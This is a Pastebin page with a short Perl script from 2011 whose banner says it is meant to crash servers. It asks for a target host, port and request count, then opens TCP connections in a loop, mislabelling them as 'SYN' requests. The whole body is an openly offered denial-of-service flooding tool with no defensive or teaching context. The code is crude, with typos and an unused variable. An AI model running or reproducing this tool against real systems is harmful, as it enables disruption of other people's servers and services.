Advertisement
saifulfaizan

try2

Nov 1st, 2011
84
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.22 KB | None | 0 0
  1. #!/usr/bin/perl
  2. #All Right Resrved Edit by saifulfaizan
  3. #My Mail :saifulfaizan@yahoo.com
  4. use IO::Socket;
  5. print q{
  6.  
  7.  
  8. -------------------------------------------
  9. 2626 26 26 26 26 2626 //
  10. 2 262 262 26 26 ---------------------
  11. 2626 6 26 2 26 26 2 2626 2626 26 |
  12. 6 2 26 626 \=-=\ 2626 6 2 2 2 2 2 6 |
  13. 2626 6 26 26 26 2 6 6 6 6 2 6 |
  14. ------------------------------ 26 626 2626 2626 26 |
  15. By saifulfaizan // |
  16. ----------------------------------
  17.  
  18. This Perl-Script Whill Crashing Server
  19.  
  20. By Flooding A Lot Of Dump Requests...............
  21.  
  22. All Right Reserved By Saifulfaizan
  23.  
  24. Ex: Perl saiful.pl 127.0.0.1 80 3000
  25.  
  26. };
  27. if(!defined($ARGV[2])){
  28. print "Dos Target : ";
  29. $host = <STDIN>;
  30. chop ($host);
  31. print "Port : ";
  32. $port = <STDIN>;
  33. chop ($port);
  34. print "SYN Requests to send : ";
  35. $num = <STDIN>;
  36. chop ($num);
  37. }
  38. if(defined($ARGV[2])){
  39. $host = $ARGV[0];
  40. $port = $ARGV[1];
  41. $num = $ARGV[2];
  42. }
  43. for ($i=0; $i<$num; $i++)
  44. {
  45. $len = length $form;
  46. $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "Can't Connect,It May The Server Dose d?.\n";
  47. syswrite STDOUT, "[*]SYN Request: $i\n";
  48. }
  49.  
  50. print "\n\nEnd Of Dos\n\n\n";
  51. print "Press Enter To Exit...";
  52. $end = <STDIN>;
  53. chop ($end);
  54.  
  55.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement